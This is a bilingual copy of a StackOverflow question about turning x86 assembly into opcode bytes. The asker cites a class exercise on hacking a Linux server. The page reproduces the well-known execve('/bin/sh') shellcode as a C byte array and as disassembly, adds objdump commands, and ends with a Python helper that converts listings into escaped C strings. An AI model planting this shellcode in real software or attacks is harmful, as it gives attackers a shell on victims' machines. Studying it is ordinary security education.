Linux: how to get the opcodes of a C program
Disclaimer: this page is a Chinese-English bilingual translation of a popular StackOverflow question, provided under the CC BY-SA 4.0 license. If you use it, you must follow the same CC BY-SA license, cite the original address and author information, and attribute it to the original authors (not me): StackOverflow
Original address: http://stackoverflow.com/questions/9813027/
How to get opcodes of a C program
Asked by George Panic
I know how to get the assembly code of my program using gdb, but how do I get the opcode? I need it to hack a linux server (don't worry, it's part of a class I'm having, so no real server will be harmed). Actually I was reading this article and I'm wondering how I can get from assembly:
```
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     jmp    0x800015f <main+47>
0x8000135 <main+5>:     popl   %esi
0x8000136 <main+6>:     movl   %esi,0x8(%esi)
0x8000139 <main+9>:     movb   $0x0,0x7(%esi)
0x800013d <main+13>:    movl   $0x0,0xc(%esi)
0x8000144 <main+20>:    movl   $0xb,%eax
0x8000149 <main+25>:    movl   %esi,%ebx
0x800014b <main+27>:    leal   0x8(%esi),%ecx
0x800014e <main+30>:    leal   0xc(%esi),%edx
0x8000151 <main+33>:    int    $0x80
0x8000153 <main+35>:    movl   $0x1,%eax
0x8000158 <main+40>:    movl   $0x0,%ebx
0x800015d <main+45>:    int    $0x80
0x800015f <main+47>:    call   0x8000135 <main+5>
0x8000164 <main+52>:    das
0x8000165 <main+53>:    boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>:    das
0x8000169 <main+57>:    jae    0x80001d3 <__new_exitfn+55>
0x800016b <main+59>:    addb   %cl,0x55c35dec(%ecx)
End of assembler dump.
```
the following:
```
testsc.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
```
The system is Linux x86 and the language I will be using is C. I'd really like an automated way, but a manual solution would work too.
I mean, how do I convert %ebp, %esi, %esp etc.? Is there a map I can use? Or an automated program?
Accepted answer by George Panic
Found it! First disassemble, then type x/bx, hit enter and get one by one the hex representation of the assembly commands!
Answered by Kaz
Here you go:
```
Disassembly of section .data:

00000000 <shellcode>:
   0:   eb 2a                   jmp    2c <shellcode+0x2c>
   2:   5e                      pop    %esi
   3:   89 76 08                mov    %esi,0x8(%esi)
   6:   c6 46 07 00             movb   $0x0,0x7(%esi)
   a:   c7 46 0c 00 00 00 00    movl   $0x0,0xc(%esi)
  11:   b8 0b 00 00 00          mov    $0xb,%eax
  16:   89 f3                   mov    %esi,%ebx
  18:   8d 4e 08                lea    0x8(%esi),%ecx
  1b:   8d 56 0c                lea    0xc(%esi),%edx
  1e:   cd 80                   int    $0x80
  20:   b8 01 00 00 00          mov    $0x1,%eax
  25:   bb 00 00 00 00          mov    $0x0,%ebx
  2a:   cd 80                   int    $0x80
  2c:   e8 d1 ff ff ff          call   2 <shellcode+0x2>
  31:   2f                      das
  32:   62 69 6e                bound  %ebp,0x6e(%ecx)
  35:   2f                      das
  36:   73 68                   jae    a0 <shellcode+0xa0>
  38:   00 89 ec 5d c3 00       add    %cl,0xc35dec(%ecx)
```
Note how the last 00 in that add %cl instruction comes from the string null terminator byte; it is not explicit.
How I got this was that I simply compiled your declaration with
```
gcc testsc.c -c
```
and then
```
objdump -D testsc.o
```
Answered by ouah
You can use:
```
gcc -S -c tst.c -o -
```
or
```
gcc -g -ggdb -c tst.c
objdump -S tst.o
```
to get the disassembly of your program with the opcodes.
To get the disassembly of your char array, you can use:
```
gcc -c tst.c
objdump -D -j .data tst.o
```
Answered by zvrba
Create a small assembly file, say code.s. Then put the following inside:
```
.text
.byte 0xeb, 0x2a, 0x5e, ..
```
Assemble it with as code.s -o code.o and use objdump to disassemble the result.
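As an added example (not from the question or any of the answers), the following Python helper automates the conversion the question asks for: it turns an objdump -d listing into opcode bytes and then into the escaped C string form used in testsc.c, handling the continuation lines objdump prints for long instructions, and it computes the size the array occupies in .data including the implicit NUL terminator that Kaz's answer points out. The listing it parses is a constructed sample, not output from the page.

```python
import re
from typing import List, NamedTuple

class Insn(NamedTuple):
    offset: int   # address within the section, as objdump prints it
    code: bytes   # the instruction's opcode bytes
    asm: str      # mnemonic and operands, as objdump prints them

# One objdump line: "  offset:<TAB>hex bytes <TAB>mnemonic operands"; a wrapped
# continuation line carries more bytes of the previous instruction and no mnemonic.
_LINE = re.compile(r"^\s*([0-9a-f]+):\t((?:[0-9a-f]{2} )+)\s*(?:\t(.*))?$")

# Constructed sample in "objdump -d" format (not output from the page's session);
# the 11-byte movl at offset 3 wraps onto the continuation line at offset a.
SAMPLE_LISTING = (
    "Disassembly of section .text:\n\n00000000 <f>:\n"
    "   0:\t55                   \tpush   %ebp\n"
    "   1:\t89 e5                \tmov    %esp,%ebp\n"
    "   3:\tc7 84 24 80 00 00 00 \tmovl   $0x2a,0x80(%esp)\n"
    "   a:\t2a 00 00 00 \n"
    "   e:\t31 c0                \txor    %eax,%eax\n"
    "  10:\t5d                   \tpop    %ebp\n"
    "  11:\tc3                   \tret\n"
)

def parse_objdump(listing: str) -> List[Insn]:
    """Turn an 'objdump -d' / 'objdump -D' listing into (offset, bytes, asm) records."""
    insns: List[Insn] = []
    for line in listing.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # section headers, symbol labels, blank lines
        code, asm = bytes.fromhex(m.group(2)), (m.group(3) or "").strip()
        if not asm and insns:  # continuation line: glue bytes onto the previous record
            insns[-1] = insns[-1]._replace(code=insns[-1].code + code)
        else:
            insns.append(Insn(int(m.group(1), 16), code, asm))
    return insns

def to_c_literal(code: bytes, per_line: int = 16) -> str:
    """Render opcode bytes in the escaped C string style of testsc.c, 16 bytes per line."""
    chunks = [code[i:i + per_line] for i in range(0, len(code), per_line)]
    return "\n".join('"' + "".join(f"\\x{b:02x}" for b in c) + '"' for c in chunks)

def from_c_literal(literal: str) -> bytes:
    """Inverse of to_c_literal: collect every \\xHH escape of a (multi-line) literal."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))

def stored_size(literal: str) -> int:
    """Size of 'char a[] = <literal>;' in .data: the escapes plus the implicit NUL terminator."""
    return len(from_c_literal(literal)) + 1
```

The NUL counted by stored_size is the byte objdump -D shows as the trailing 00 of the last instruction in Kaz's listing.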